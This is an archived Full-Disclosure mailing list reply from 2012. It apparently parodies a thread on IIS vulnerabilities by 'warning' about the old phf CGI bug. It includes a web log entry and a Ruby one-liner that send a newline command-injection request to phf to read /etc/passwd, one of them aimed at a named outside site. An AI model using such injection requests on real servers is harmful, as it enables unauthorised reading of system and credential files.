| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CADYtyvK3R2GA7_vpxgryT9kiMRhsWeTcNAPn_hQkaXoBS_XDtA@mail.gmail.com>
Date: Tue, 17 Jul 2012 11:23:36 -0400
From: Григорий Братислава <musntlive@...il.com>
To: king cope <isowarez.isowarez.isowarez@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Unpatched IIS Vulnerabilities / Microsoft
July Security Bulletin
On Tue, Jul 17, 2012 at 10:11 AM, king cope
<isowarez.isowarez.isowarez@...glemail.com> wrote:
> Hello Jan,
> I did some additional tests for the IIS bugs.
>
> * IIS 6.0 PHP authentication bypass is only possible on Windows Server
> 2003 SP1. SP2 seems unaffected
> So take that bug as resolved, my mistake as I didn't have a fully
> patched system online when testing.
kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.
Hello full disclosure!! !! !!
Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.
PoC on is my system:
213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
In Ruby (here we is own rsnake):
require 'open-uri'
open('http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists